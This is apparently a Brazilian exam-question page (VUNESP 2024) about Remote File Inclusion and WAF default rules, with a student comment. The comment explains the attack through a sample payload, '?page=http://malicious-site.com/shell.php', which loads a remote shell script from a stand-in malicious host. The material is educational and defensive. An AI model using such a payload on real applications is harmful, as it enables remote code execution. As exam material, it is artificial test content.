Um firewall do tipo WAF oferecido por um provedor de serviç...

Próximas questões
Com base no mesmo assunto
Q3255708
Segurança da Informação Firewall em Segurança da Informação , Ataques e ameaças ,
Ano: 2024 Banca: VUNESP Órgão: UNESP Prova: VUNESP - 2024 - UNESP - ssistente de Suporte Acadêmico assistente de suporte Acadêmico IV - Área de Atuação: Computação de Alto Desempenho e Computação em Nuvem |
Q3255708 Segurança da Informação
Um firewall do tipo WAF oferecido por um provedor de serviços de nuvem apresenta regras padrões de configuração que podem ser usadas para defesa contra tipos específicos de ataque. Um desses tipos de ataque é conhecido como Remote File Inclusion, o qual consiste
Alternativas

Comentários

Veja os comentários dos nossos alunos

Um WAF (Web Application Firewall), como os oferecidos em serviços de nuvem (AWS WAF, Azure WAF, Cloudflare), possui regras predefinidas para bloquear tentativas de:

  • RFI;
  • SQL Injection;
  • XSS;
  • Command Injection;
  • Path Traversal;
  • File Inclusion (RFI/LFI).

Ele atua como uma barreira entre o cliente e o servidor, inspecionando requisições HTTP e bloqueando padrões maliciosos com base em assinaturas ou regras personalizadas.

Remote File Inclusion (RFI): Refere-se à inclusão remota de arquivos, usualmente através de scripts no servidores web. Isso é feito por meio de um parâmetro mal validado (ex: ?page=http://malicious-site.com/shell.php), que pode levar à execução arbitrária de código.

Uma causa comum pode ser o uso de include() ou require() em PHP com entrada de usuário sem validação adequada. Esse ataque permite que o atacante hospede um arquivo malicioso e o faça ser incluído e executado pela aplicação vulnerável.

b) SQL Injection

c) Session Hijacking

d) DoS (Denial of Service)

e) Cross-Site Scripting (XSS)

Clique para visualizar este comentário

Visualize os comentários desta questão clicando no botão abaixo

Questões de assuntos semelhantes

Provas relacionadas